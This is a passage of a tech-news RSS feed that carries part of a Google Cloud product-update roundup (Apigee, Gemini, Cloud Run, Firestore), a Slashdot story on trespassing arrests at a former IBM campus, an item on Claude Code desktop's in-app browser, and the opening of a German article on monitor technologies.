<li><strong>Master Your Launch: The Apigee Production Go-Live Checklist<br></strong>Ensure a secure launch with the Apigee production guide. Join Nicola Cardace on May 28 to explore security guardrails, including IAM roles, mTLS configurations, and encrypted KVM migrations. Scheduled at 11 AM EDT / 5 PM CEST to support EMEA and AMER teams, this TechTalk provides the technical roadmap you need to flip the switch with absolute confidence.<br><br><strong><a href="https://goo.gle/4elMCTI" rel="noopener" target="_blank">Register for the May 28 Community TechTalk</a></strong></li>
<li>
<p><strong>Transforming APIs into Governed Agentic Tools on the Google Cloud Agentic Platform<br></strong><span>Turn your APIs into secure, governed agentic tools on the Google Cloud Agentic Platform. Join Specialist Christophe Lalevée on May 7 for a technical deep dive into AI productization. Scheduled at 5 PM CEST / 11 AM EDT to maximize coverage for developers across EMEA and AMER, this session explores the integration and governance frameworks required to scale enterprise-ready AI with confidence.</span></p>
<p><a href="https://goo.gle/3PfWm7M" rel="noopener" target="_blank">Register for the May 7 Community TechTalk</a></p>
</li>
<li><a href="https://docs.cloud.google.com/compute/docs/accelerator-optimized-machines#g4-machine-types" rel="noopener" target="_blank">Fractional G4 VMs</a> are Generaly Available, providing a highly efficient and cost-effective entry point for AI and graphics workloads. These new configurations, using NVIDIA virtual GPU (vGPU) technology, allow you to leverage the power of the NVIDIA RTX PRO 6000 Blackwell Server Edition GPUs in flexible, smaller increments, so you can right-size your infrastructure to match the specific demands of your applications. By providing more granular access to advanced hardware, fractional G4 VMs let you optimize resource allocation and reduce overhead without sacrificing performance. You can now select from additional GPU slice sizes for your specific needs:
<ul>
<li><strong>1/2 GPU:</strong> Ideal for more intensive tasks such as LLM inference, robotics sensor simulation, and high-fidelity 3D rendering.</li>
<li><strong>1/4 GPU:</strong> Optimized for mainstream workloads, including mid-range creative design, video transcoding, and real-time data visualization.</li>
<li><strong>1/8 GPU:</strong> Great for lightweight applications such as remote desktops, productivity tools, and entry-level streaming services.</li>
</ul>
</li>
<li>
<p>Transitioning AI from a sandbox prototype to an enterprise-grade system is a major hurdle. A monolithic script won't suffice for widespread deployment. To achieve true scale and reliability with Gemini, organizations must adopt service-oriented micro-agent architectures, establish Zero-Trust security, and implement rigorous EvalOps. Master the "Agentic Maturity Ladder" to ensure your AI &amp; Agentic solutions are robust, secure, and ready for the real world.</p>
<p><a href="https://lnkd.in/gHBH8cTv" rel="noopener" target="_blank">Watch the deep dive</a> and <a href="https://discuss.google.dev/t/beyond-the-prototype-scaling-production-grade-agents-with-gemini/356140" rel="noopener" target="_blank">read the developer blog</a> to learn more.</p>
</li>
<li><strong>ML Development in VS Code with Google Cloud Power: Workbench Extension Now Available<br></strong>Data scientists and developers can now combine the local productivity of VS Code with the scalable infrastructure of Google Cloud. The new Google Cloud Workbench Notebooks extension allows you to connect to and run notebooks on managed cloud environments directly within your local IDE. This integration streamlines the ML lifecycle by eliminating context switching and providing high-performance compute for complex workloads in a familiar interface. As part of our commitment to the developer ecosystem, the extension is fully open-sourced to support community-driven innovation.
<ul>
<li><strong>Install from Marketplace:</strong> <a href="https://marketplace.visualstudio.com/items?itemName=GoogleCloudTools.workbench-notebooks" rel="noopener" target="_blank">GoogleCloudTools.workbench-notebooks</a></li>
<li><strong>Contribute on GitHub:</strong> <a href="https://github.com/GoogleCloudPlatform/colab-enterprise-vscode" rel="noopener" target="_blank">colab-enterprise-vscode</a></li>
</ul>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Apr 20 - Apr 24</h3>
<ul>
<li><strong>Announcing the 2026 Google Cloud Partners of the Year<br></strong>Google Cloud is honored to celebrate the winners of the 2026 Partner of the Year awards! These awards recognize an exceptional group of partners across AI, Security, Infrastructure, and more, who have demonstrated a commitment to customer success. From global system integrators to specialized startups, these winners are leveraging the power of Google Cloud to solve complex challenges and drive digital transformation worldwide. Join us in congratulating these organizations for their innovation, collaboration, and impactful results over the past year.<br><br>See the <a href="https://cloud.google.com/blog/topics/partners/2026-partners-of-the-year-winners-next26">2026 Partner Award winners</a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Apr 13 - Apr 17</h3>
<ul>
<li>We're excited to announce the <strong>Public Preview of Datastream’s metadata integration with Knowledge Catalog</strong>. This is the first step in our vision to provide a centralized, "single pane of glass" for all Datastream assets. The enhancement automatically synchronizes Streams, Connection Profiles, and Private Connections, eliminating data silos. It enhances discoverability, allowing you to search for Datastream assets using the same interface as BigQuery tables. Centralized governance is also provided, making your real-time data estate more transparent and easier to manage.</li>
<li><strong>Upgrading Apigee OPDK to 4.53 with OS Modernization<br></strong>Modernize your infrastructure using Google’s official, sequential upgrade path. Our Technical expert, Rakesh Talanki outlines how to upgrade Apigee OPDK to v4.53 while migrating to a supported OS (RHEL 8.x/9.x). This guide covers the "build-out" methodology, including multi-data center syncing, to ensure a stable, zero-downtime transition<br><br><a href="https://goo.gle/3Oa8uqy" rel="noopener" target="_blank">Read the guide</a></li>
<li><strong>Cloud Run Worker Pools and CREMA: Powering Serverless AI at Scale<br></strong>Google Cloud has announced the General Availability of <strong>Cloud Run worker pools</strong>, a new resource type designed specifically for pull-based, non-HTTP workloads. Unlike traditional Cloud Run services that scale based on request traffic, worker pools provide an "always-on" environment for background tasks like processing message queues or running large-scale AI inference. To support this, Google Cloud also open-sourced the <strong>Cloud Run External Metrics Autoscaler (CREMA)</strong>. Built on KEDA, CREMA enables queue-aware autoscaling for worker pools, allowing them to dynamically scale based on external signals like Pub/Sub backlog or Kafka lag.</li>
<li><strong>Apigee Model Context Protocol (MCP) now Generally Available<br></strong>Expose enterprise APIs as MCP tools for agentic AI applications with the General Availability of MCP in Apigee. This update allows developers to transform APIs into AI-ready tools using OpenAPI Specifications, removing the need for local MCP servers or additional infrastructure. With managed endpoints and semantic search in API hub, you can now provide AI agents with secure, governed access to enterprise data at scale.<br><br><a href="https://goo.gle/3QfoEQ4" rel="noopener" target="_blank"><em>Explore the MCP overview</em></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Apr 6 - Apr 10</h3>
<ul>
<li><strong>Community TechTalk: Powering Retail Agents with ADK, UCP &amp; Apigee X<br></strong>Move beyond basic chatbots to secure, transactional AI experiences. Join our Community TechTalk on April 16 to learn how Apigee X and Gemini build a "Trust Layer" for AI shopping assistants using UCP standards. We’ll demonstrate how to block prompt injections with Model Armor and implement cost governance via token limits to secure the path from discovery to purchase.<br><br><a href="https://goo.gle/41ocUgq" rel="noopener" target="_blank"><span>Register for the TechTalk</span></a></li>
<li><strong>Implement multimodal capabilities in your AI agents<br></strong>Explore three new reference architectures for building sophisticated multi-agent AI systems that can process and analyze multimodal data. To analyze disparate multimodal data and produce a high-confidence classification, see <a href="https://docs.cloud.google.com/architecture/agentic-ai-classify-multimodal-data"><span>Classify multimodal data</span></a><span>. To create a fluid conversational AI that processes audio and video streams in real time, see</span> <a href="https://docs.cloud.google.com/architecture/agentic-ai-bidirectional-multimodal-streaming"><span>Enable live bidirectional multimodal streaming</span></a><span>. To consolidate fragmented multimodal data into a searchable knowledge graph, see</span> <a href="https://docs.cloud.google.com/architecture/agentic-ai-multimodal-graph-rag-resource-orchestration"><span>Multimodal GraphRAG resource orchestration</span></a><span>.</span></li>
<li><strong>Automate SecOps workflows with an agentic AI system<br></strong>To accelerate incident response and reduce manual toil for your security team, you need a system that can automate remediation playbooks. Our new reference architecture helps you build an AI agent that orchestrates complex triage and investigation workflows across disparate security tools, such as SIEM, CSPM, and EDR, from a single interface. See the full guide to <a href="https://docs.cloud.google.com/architecture/agentic-ai-orchestrate-security-ops-workflows"><span>orchestrate security operations workflows</span></a><span>.</span></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 30 - Apr 3</h3>
<ul>
<li><strong>ASEAN Webinar | April 30: Mastering Agentic Governance at Scale with GCP<br></strong>As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud experts <strong>Shilpi Puri &amp; Wely Lau</strong> for a <strong>webinar</strong> on <strong>April 30th at 11:00 AM SGT</strong> to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.<br><br><a href="https://goo.gle/47FX1Wn" rel="noopener" target="_blank"><strong>RSVP here.</strong></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 23 - Mar 27</h3>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Turn your API sprawl into an agent-ready catalog<br></strong><span>As organizations scale, APIs often become scattered across multiple gateways, creating "blind spots" that hinder AI adoption. To solve this, we’ve introduced two new capabilities for Apigee API hub: a new integration with API Gateway to automatically centralize API metadata into a single control plane, and a specification boost add-on (now in public preview). This add-on uses AI to enhance your API documentation with the precise examples and error codes that AI agents need to function reliably.<br><br></span><a href="https://goo.gle/47dEYqc" rel="noopener" target="_blank"><span>Read the full blog post to get started.</span></a></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Webinar | April 16: AI Command &amp; Control<br></strong><span>As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud expert Satyam Maloo for a webinar on April 16th at 11:00 AM IST to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.<br><br></span><a href="https://goo.gle/4t43Vg4" rel="noopener" target="_blank"><span>RSVP here.</span></a></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Modernizing and Decoupling Event Ingestion with Apigee<br></strong><span>In modern cloud-native architectures, decoupling producers from consumers is critical for building resilient systems. While Google Cloud Pub/Sub provides a scalable backbone, exposing it directly to external clients can introduce security and management overhead. This new guide explores how to leverage Apigee as an intelligent HTTP ingestion point. Learn how to handle security, mediation, and traffic control before messages reach your internal bus using the PublishMessage policy or Pub/Sub API.</span><br><br><a href="https://goo.gle/3POgsWF" rel="noopener" target="_blank"><span>Read the full guide.</span></a></p>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 16 - Mar 20</h3>
<ul>
<li><strong>Gemini-powered Assistant in BigQuery Studio Gets Context-Aware Upgrades<br></strong>The Gemini-powered assistant in BigQuery Studio has been transformed into a fully context-aware analytics partner, supporting your entire data lifecycle. The new capabilities include intelligent resource discovery, which uses Dataplex Universal Catalog search to find resources across projects and deep dive into metadata using natural language. You can now automate tasks, such as scheduling production-grade queries directly through the chat interface, and instantly troubleshoot long-running or failed jobs with root cause analysis and cost control auditing.<br><br><a href="https://docs.cloud.google.com/bigquery/docs/use-cloud-assist">Explore</a> the full range of what the assistant can do.</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 9 - Mar 13</h3>
<ul>
<li>
<div><strong>Want to use Gemini to develop code and don't know where to start?</strong><br>This <a href="https://medium.com/google-cloud/supercharge-your-spark-development-with-gemini-1540f1cb47d4" rel="noopener" target="_blank">article</a> includes a couple of examples of developing code with Gemini prompts; it identified changes that were needed to be made to get the code working. The article also refers to other examples that are available on github. </div>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 2 - Mar 6</h3>
<ul>
<li>
<p><span><strong>Introducing Gemini 3.1 Flash-Lite, our fastest and most cost-efficient Gemini 3 series model.</strong> Built for high-volume developer workloads at scale, 3.1 Flash-Lite delivers high quality for its price and model tier. Gemini 3.1 Flash-Lite can tackle tasks at scale, like high-volume translation and content moderation, where cost is a priority. And it can also handle more complex workloads where more in-depth reasoning is needed, like generating user interfaces and dashboards, creating simulations or following instructions.</span></p>
<p><span>Starting today, 3.1 Flash-Lite is rolling out in preview to enterprises via </span><a href="https://console.cloud.google.com/vertex-ai/studio/multimodal?mode=prompt&amp;model=gemini-3.1-flash-lite-preview"><span>Vertex AI</span></a><span> and </span><span>developers via the Gemini API in </span><a href="https://aistudio.google.com/prompts/new_chat?model=gemini-3.1-flash-lite-preview" rel="noopener" target="_blank"><span>Google AI Studio</span></a><span>.</span></p>
</li>
<li>
<div>
<p><strong>TechTalk: Implementing Device Authorization Grant (RFC 8628) for Apigee</strong><br>Learn how to authorize "headless" devices like Smart TVs or AI agents that lack keyboards and browsers. Join our Community TechTalk on March 19 (5PM CET / 12PM EDT) to go under the hood of Apigee X/Hybrid. We’ll cover the real-world mechanics of state management, polling, and human-in-the-loop security patterns for devices and autonomous agents.</p>
<p><a href="https://goo.gle/4r6o6Zi" rel="noopener" target="_blank">Register for the TechTalk</a></p>
</div>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Feb 23 - Feb 27</h3>
<ul>
<li>
<p><span><strong>Pro-level image generation gets faster and more accessible with Nano Banana 2<br></strong></span><span>Nano Banana 2 is our state-of-the-art image generation and editing model. It delivers Pro-level image generation and editing at the speed you expect from Flash — making the quality, reasoning, and world knowledge you loved about Nano Banana Pro more accessible. Learn more about the model </span><a href="https://blog.google/innovation-and-ai/technology/ai/nano-banana-2" rel="noopener" target="_blank"><span>here</span></a><span>.</span></p>
</li>
</ul>
<ul>
<li>
<p><strong>The Intelligent Path to Compliance: Transforming Regulatory QC with Google Cloud<br></strong><span>Reducing "Refuse to File" (RTF) risks and submission cycle times is critical for life sciences leaders. Google Cloud’s Regulatory Submission Semantic QC Auditor leverages Gemini and RAG architecture to transform Quality Control from a manual burden into an active, intelligent workflow.</span></p>
<p><span>By automating semantic cross-referencing, narrative coherence checks, and dynamic guidance-based auditing, this solution ensures rigorous accuracy and auditability. Operating within a secure GxP-ready environment, it empowers teams to detect subtle inconsistencies and generate remediation plans without sacrificing data privacy. <br><br></span><a href="https://discuss.google.dev/t/the-intelligent-path-to-compliance-transforming-regulatory-quality-control-with-google-cloud/335276" rel="noopener" target="_blank"><span>Learn more</span></a><span>.</span></p>
</li>
<li><span><span>Stop typing, start interacting! <strong>The Gemini Live Agent Challenge is here</strong>. Build immersive agents that can help you see, hear, and speak using Gemini and Google Cloud. Compete for your share of $80,000+ in prizes and a trip to Google Cloud Next '26!<br><br></span><span>Submissions are open from February 16, 2026 to March 16, 2026. Learn more and register at </span><a href="http://geminiliveagentchallenge.devpost.com/" rel="noopener" target="_blank"><span>geminiliveagentchallenge.devpost.com</span></a></span></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Feb 9 - Feb 13</h3>
<ul>
<li>
<p><strong><span>Introducing Gemini 3.1 Pro on Google Cloud. </span></strong></p>
<span>3.1 Pro is a noticeably smarter, more capable baseline for complex problem-solving. We’re shipping 3.1 Pro at scale, building upon our </span><a href="https://cloud.google.com/blog/products/ai-machine-learning/gemini-3-is-available-for-enterprise?e=48754805"><span>goal</span></a><span> to help you transform your business for the agentic future. Learn more about the model’s capabilities </span><a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-1-pro" rel="noopener" target="_blank"><span>here</span></a><span>. Gemini 3.1 Pro is available starting today in preview in </span><a href="https://cloud.google.com/vertex-ai?e=48754805"><span>Vertex AI</span></a><span> and </span><a href="https://cloud.google.com/gemini-enterprise?e=48754805"><span>Gemini Enterprise</span></a><span>. Developers can access the model in preview via the Gemini API in </span><a href="https://aistudio.google.com/prompts/new_chat?model=gemini-3.1-pro-preview" rel="noopener" target="_blank"><span>Google AI Studio</span></a><span>, </span><a href="https://developer.android.com/studio" rel="noopener" target="_blank"><span>Android Studio</span></a><span>, </span><a href="https://antigravity.google/blog/gemini-3-1-in-google-antigravity" rel="noopener" target="_blank"><span>Google Antigravity</span></a><span>, and </span><a href="https://geminicli.com/" rel="noopener" target="_blank"><span>Gemini CLI</span></a><span>.<br><br></span></li>
<li><strong>Automate Storage Compatibility with GKE Dynamic Default Storage Classes<br></strong>Managing storage across mixed-generation VM clusters in GKE just got easier. With the new <strong>Dynamic Default Storage Class</strong>, Google Kubernetes Engine automatically selects between Persistent Disk (PD) and Hyperdisk based on a node's specific hardware compatibility. This abstraction eliminates the need for complex scheduling rules and manual pairing, ensuring your volumes "just work" regardless of the underlying infrastructure. By defining both variants in a single class, you reduce operational overhead while maintaining peak performance and cost-efficiency across your entire cluster.<br><br><a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/hyperdisk#automated_disk_type_selection" rel="noopener" target="_blank">Explore automated disk type selection</a></li>
<li>
<p><strong>Community TechTalk: AI-Powered Apigee Development with strofa.io<br></strong><strong>Join the Apigee community on February 26</strong><span> for a deep dive into</span> <a href="https://www.google.com/search?q=http://strofa.io" rel="noopener" target="_blank"><span>strofa.io</span></a><span>. Guest speaker Denis Kalitviansky will demonstrate how this new AI-powered tool automates and orchestrates Apigee development, from local emulators to large-scale hybrid environments. Discover how to scale your API management and streamline team collaboration using the latest in AI-driven automation.</span></p>
<p><a href="https://goo.gle/3Oerns3" rel="noopener" target="_blank"><span>Register now to reserve your spot.</span></a></p>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jan 26 - Jan 30</h3>
<ul>
<li><strong><span>Simplify API Governance with Native OpenAPI v3 Support<br></span></strong>Eliminate integration debt and accelerate deployment velocity with the General Availability of OpenAPI v3 (OASv3) support for API Gateway and Cloud Endpoints. You no longer need to downgrade modern specifications to OASv2. Instead, you can now define API contracts and enforce critical policies—including telemetry, quotas, and security—using native Google-specific extensions directly within your OASv3 files. This update ensures your APIs are secure by design while remaining fully compatible with the modern developer ecosystem and Google Cloud’s AI services.<br><br><a href="https://goo.gle/49Wx58Z" rel="noopener" target="_blank"><span>Get started with OpenAPI v3 on API Gateway and Cloud Endpoints.</span></a></li>
</ul>
<ul>
<li><strong><span>Accelerate API Testing with the New Open Source API Tester<br></span></strong>Start validating your APIs with API Tester, a simple, YAML-based Test Driven Development (TDD) framework. Designed for the Apigee community, this tool allows you to write human-readable tests, run them instantly via a web client or CLI, and perform deep unit testing on Apigee proxies. With native support for JSONPath assertions and Apigee shared flows, you can verify everything from payload data to internal variables like <code>proxy.basepath</code><span> without leaving your terminal.<br><br></span><a href="https://goo.gle/4q5WDGK" rel="noopener" target="_blank"><span>Explore the API Tester guide and start testing your proxies today.</span></a></li>
<li><strong><span>Secure Sensitive Data with Kubernetes Secrets in Apigee hybrid<br></span></strong>Enhance security in Apigee hybrid by accessing Kubernetes Secrets directly within your API proxies. This hybrid-exclusive feature keeps sensitive credentials within your cluster boundary and prevents replication to the management plane. It supports strict separation of duties: operators manage secrets via <code>kubectl</code><span>, while developers reference them as secure flow variables—ideal for high-compliance and GitOps workflows.<br><br></span><a href="https://goo.gle/4qEVffo" rel="noopener" target="_blank"><span>Implement Kubernetes Secrets in your hybrid proxies.</span></a></li>
<li><strong><span>See the Console in a Whole New Light: Dark Mode is Now Generally Available in Google Cloud<br></span></strong>Elevate your cloud management workflow with Dark Mode, now generally available in the Google Cloud console. We have delivered a modern, cohesive, and accessible experience reimagined for maximum comfort and productivity—especially during extended working hours and low-light environments. Dark Mode can be enabled automatically based on your operating system's preference, or manually through the Settings  -&gt; Appearance menu.<br><br><a href="https://docs.cloud.google.com/docs/get-started/console-appearance"><span>Switch to Dark Mode today to enjoy a modern, comfortable, and productive environment!</span></a></li>
<li><strong><span>Apigee X Networking: PSC or VPC Peering?<br></span></strong>Deciding how to connect Apigee X? Watch this video to compare Private Service Connect and VPC Peering. We break down northbound and southbound routing, IP consumption, and how to reach targets on-prem or in the cloud. Learn to simplify your architecture and avoid common networking "gotchas" for a smoother deployment.<br><br><a href="https://goo.gle/4bWBGdV" rel="noopener" target="_blank"><span>Watch the video.</span></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jan 19 - Jan 23</h3>
<ul>
<li><strong>Bridge the Gap: Excel-to-API Conversion in Apigee Portals<br></strong><span>Give your customers more ways to connect! This new article by Tyler Ayers explores how to extend the Apigee Integrated Portal to support direct Excel file uploads. By leveraging SheetJS and custom portal scripts, you can enable users to upload spreadsheets, preview data, and submit it directly to your APIs, all without writing a single line of integration code themselves. It’s a powerful way to simplify onboarding for those who aren't yet API-ready.<br><br></span><a href="https://goo.gle/3Nq3Pjo" rel="noopener" target="_blank"><span>Learn how to build it</span></a><span>.</span></li>
<li><strong>Elevate your applications with Firestore’s new advanced query engine<br></strong><span>We have fundamentally reimagined Firestore with pipeline operations for Enterprise edition. Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.<br><br></span><a href="https://cloud.google.com/blog/products/data-analytics/new-firestore-query-engine-enables-pipelines?e=48754805"><span>Learn more about Firestore pipeline operations.</span></a></li>
</ul></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[People Keep Sneaking Into an Empty IBM Campus - and Then Getting Arrested]]></title>
<description><![CDATA[Since February, New York state police have arrested 48 people for trespassing on a former IBM campus in Somers, New York, reports the Wall Street Journal. 30 of the arrests were teenagers.

The long-vacant site has become a magnet for so-called urban explorers, who prowl abandoned malls, hospital...]]></description>
<link>https://tsecurity.de/de/3662486/it-security-nachrichten/people-keep-sneaking-into-an-empty-ibm-campus-and-then-getting-arrested/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662486/it-security-nachrichten/people-keep-sneaking-into-an-empty-ibm-campus-and-then-getting-arrested/</guid>
<pubDate>Sun, 12 Jul 2026 00:52:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Since February, New York state police have arrested 48 people for trespassing on a former IBM campus in Somers, New York, reports the Wall Street Journal. 30 of the arrests were teenagers.

The long-vacant site has become a magnet for so-called urban explorers, who prowl abandoned malls, hospitals, power plants, amusement parks, factories and any other disused structure they can breach... [I]t's been turbocharged by artsy videos on Instagram and TikTok that spur others to create their own posts, luring still more curiosity seekers... In Somers, social-media images of the old IBM campus — a sprawling, pyramid-studded 1980s complex designed by the late I.M. Pei's firm — show dystopian scenes: busted windows, tossed rooms and graffitied walls. But they also give eerie glimpses of conference rooms and cubicles unchanged since IBM left a decade ago, as if employees had fled the daily grind one day and never returned... 

One man in his mid-20s faces felony charges; police allege he had a loaded 9mm gun and took a Sony camera and power strip among other souvenirs. Andrew Proto, a defense lawyer, said "a 15-second clip" isn't worth a criminal record... Proto said he has represented or advised several minors arrested on the campus. The Somers town court clerk said some defendants received a 6-month "adjournment in contemplation of dismissal," meaning charges will be dropped and their arrest sealed if they avoid trouble. Some explorers who have posted about the IBM site say they follow an observe-and-preserve ethos and reject vandalism. They say they're driven by curiosity, the thrill of roaming forbidden spaces and a zeal to document discoveries — and that they're careful and know their limits. 

"It actually gives me hope when I hear that kids are out there getting into trouble," says Bradley Garrett, a cultural geographer and author of the book "Explore Everything: Place-Hacking the City," about his own urbex adventures. He sees urban exploration as "a gateway drug in a good way, sometimes, into intellectual curiosity about history and culture." But Garrett said popular spots can be "loved to death" online — and then shut down, looted or set ablaze. 

"Trespassers were blamed for a March 30 fire, reports a local newspaper, "that damaged one of the buildings and required volunteer firefighters to spend three hours extinguishing the blaze."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=People+Keep+Sneaking+Into+an+Empty+IBM+Campus+-+and+Then+Getting+Arrested%3A+https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F07%2F11%2F2129203%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F07%2F11%2F2129203%2Fpeople-keep-sneaking-into-an-empty-ibm-campus---and-then-getting-arrested%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://slashdot.org/story/26/07/11/2129203/people-keep-sneaking-into-an-empty-ibm-campus---and-then-getting-arrested?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic Adds A Dedicated In-App Browser To Claude Code Desktop]]></title>
<description><![CDATA[Anthropic recently announced a major update for developers using its desktop tools. The company just introduced a dedicated in-app browser for the Claude Code desktop application. This new feature allows users to access web pages, read documentation, and interact with online resources without eve...]]></description>
<link>https://tsecurity.de/de/3661886/ios-mac-os/anthropic-adds-a-dedicated-in-app-browser-to-claude-code-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661886/ios-mac-os/anthropic-adds-a-dedicated-in-app-browser-to-claude-code-desktop/</guid>
<pubDate>Sat, 11 Jul 2026 15:09:01 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Anthropic recently announced a major update for developers using its desktop tools. The company just introduced a dedicated in-app browser for the Claude Code desktop application. This new feature allows users to access web pages, read documentation, and interact with online resources without ever leaving their primary coding environment.



It aims to reduce interruptions and streamline how developers rely on artificial intelligence during daily software engineering tasks.



The new tool helps you research code without switching windows



According to the company, developers can now open framework references, check code repositories, and review live dashboards alongside their active project files. The development team highlighted the release on social media, stating, “Claude Code on desktop now has an in-app browser.” They explained that the AI assistant can easily “pull up docs, designs, or any other site.”



Additionally, it can read and click through web pages exactly like it interacts with local development servers. This eliminates the need to constantly bounce between a standalone browser and a coding workspace just to verify technical specifications or debug an application.



A sandboxed environment keeps your personal login data completely secure



Security remains a major focus for this desktop feature. The built-in browser operates in a completely clean and sandboxed profile. This means it does not access your personal browsing history or saved passwords. As the developers noted, the setup is highly flexible, allowing you to “choose whether sessions persist.”



If a user needs the system to act on their behalf using an active login, the company recommends sticking to the standard Chrome extension instead. The desktop browser is strictly for building and testing, protecting your identity while you work.



By integrating web access directly into the workspace, the company is pushing its coding assistant beyond a simple chat interface into a fully featured development platform. Instead of constantly switching between windows, programmers can keep their research and actual coding connected in one single place.]]></content:encoded>
</item>
<item>
<title><![CDATA[Monitor-Upgrade für Ihren PC: OLED, IPS oder Mini-LED – was bringt im Alltag wirklich etwas?]]></title>
<description><![CDATA[Ein neuer Monitor ist das wohl spürbarste Upgrade für jeden PC-Arbeitsplatz. Schließlich starren wir täglich stundenlang genau auf diese eine Komponente. Während vor einigen Jahren noch vor allem die Bildschirmdiagonale und die Auflösung entscheidend waren, stehen Käufer heute vor einer technolog...]]></description>
<link>https://tsecurity.de/de/3661428/it-nachrichten/monitor-upgrade-fuer-ihren-pc-oled-ips-oder-mini-led-was-bringt-im-alltag-wirklich-etwas/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661428/it-nachrichten/monitor-upgrade-fuer-ihren-pc-oled-ips-oder-mini-led-was-bringt-im-alltag-wirklich-etwas/</guid>
<pubDate>Sat, 11 Jul 2026 09:17:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ein <a href="https://www.pcwelt.de/article/3041188/bester-monitor-test.html" target="_blank" rel="noreferrer noopener">neuer Monitor</a> ist das wohl spürbarste Upgrade für jeden PC-Arbeitsplatz. Schließlich starren wir täglich stundenlang genau auf diese eine Komponente. Während vor einigen Jahren noch vor allem die Bildschirmdiagonale und die Auflösung entscheidend waren, stehen Käufer heute vor einer technologischen Grundsatzfrage.</p>



